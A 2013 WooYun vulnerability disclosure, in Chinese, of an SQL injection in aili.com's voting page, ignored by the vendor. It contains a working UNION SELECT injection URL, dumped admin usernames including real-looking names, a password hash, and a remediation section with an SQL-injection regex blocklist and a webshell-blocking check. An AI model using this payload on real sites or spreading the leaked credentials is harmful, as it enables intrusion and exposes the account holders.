当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025661

漏洞标题:爱丽网注入一个,可脱裤子。。。

相关厂商:aili.com

漏洞作者: 逆雪寒

提交时间:2013-06-11 19:23

修复时间:2013-06-16 19:24

公开时间:2013-06-16 19:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-11: 细节已通知厂商并且等待厂商处理中
2013-06-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在一个注入点~~ 可脱 newcms 裤子。。。

详细说明:

正在逛着 突然看到 http://plus.aili.com/vote/vote_end.php?vid=31 这个投票~~。 习惯就加 单' 哦也~~ 出错了
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_main where id = 31\'
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_problem where vid = 31\'
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
虽然 对 '转意了。。。但还是木有用 数字类型 转意~~ 木啥用呀
手爆开始
http://plus.aili.com/vote/vote_end.php?vid=31%20UNION%20ALL%20SELECT%20username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20admin%20--
在爆出来的某个账号上。我尝试进行彩虹表发现个问题:
账号:
leejin
密码:
650ff33b2875af2f34a2b576dee83947
这样的密码,,看起来复杂其实组合简单,还是很容易给破解的。 建议 数字+英文+古怪字符(or 大写字母) 万无一失

漏洞证明:

System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_main where id = 31 UNION ALL SELECT username,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from admin --
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 48
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid =
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = admin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = Aidewei
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = chenming
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = dingge
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = jackzxrl
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = leejin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = seo
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = test
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = test-李杰鹏
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = wangfeng
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = wang晨
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = yongbao
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = yongbaolin
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zhangwen
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zhaoyang
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = zxmr
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 爱德威
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 白晓萌
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 边鑫
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡嘉铭
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡利
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 蔡寅寅
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹灿
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹翠翠
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 曹崴
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 测试用户
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......
Please wait Try.Invalid SQL: select * from new_vote_option where pid = 岑月
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
on line
System Maintenance......

修复方案:

看了下爱丽网 这个厂商。。。漏洞不断~~ 注入不断。。 感觉开发和运维~是木有啥好办法了。只能来一堵一个(啥时候是个头)。 那我来给你们个方案吧。。。。 既然是PHP。。没有混在其他语言。那还是好办的。
1、防SQL注入
百度一下 360.cn 写过一个防SQL注入的PHP脚本。 用过来 GPC 进行检测。部分代码:
$getfilter="'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\
s+(TABLE|DATABASE)";
$postfilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTE
R|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|AL
TER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
foreach ($_GET as $key=>$value) {
StopAttack($key, $value, $getfilter);
}
foreach ($_POST as $key=>$value) {
StopAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key=>$value) {
StopAttack($key, $value, $cookiefilter);
}
下载这个脚本。把这个脚本放到 web目录外。 然后 修改PHP.ini :
auto_prepend_file = 360_safe3.php
注:但可能会和你之前的代码 过滤和转意部分代码有冲突,自己看情况修改。 这样做以后。服务器所有存在的PHP文件,都自动得到保护了。。不用在一个一个~堵了。叽里旮旯儿的代码都护住了。。运维开发可以安心睡觉了。
这样做唯一的问题就是 服务器负载会多 %30 - %60。 但对于用户数据和安全来说。。你们是值得的。
2、让已经存在的 "一句话木马”失效
服务器上应该存在不少 一句话木马了。。我见到白帽子们已经都上传WEBSHELL 上去了。。菜刀也上了。 菜刀是通过 php 的 base64编码进行 POST 请求来执行PHP脚本(我自己抓包看过),所以呢 就算你按照我的第一部 加了360安全脚本是防不住已经存在的 WEBSHELL。 我们要想办法让存在的WEBSHELL失效。判断POST或者GET里有存在base64_decode 解密函数的存在,那%99就是菜刀在请求。 那么这样来做,在我说的第一部的360 安全脚本的 StopAttack哪里 修改下代码。加多一句:
preg_match("/base64_decode/is",$StrFiltValue) && exit('_stop attack');
部分代码:
function StopAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq) {
global $attack_360_log;
if (is_array($StrFiltValue)) {
$StrFiltValue = implode($StrFiltValue);
}
preg_match("/base64_decode/is",$StrFiltValue) && exit('_stop attack');
if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1) {
测试结果:

1.jpg


。。。不希望再看到爱丽网被注入。。。。。。

版权声明:转载请注明来源 逆雪寒@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-06-16 19:24

厂商回复:

最新状态:

暂无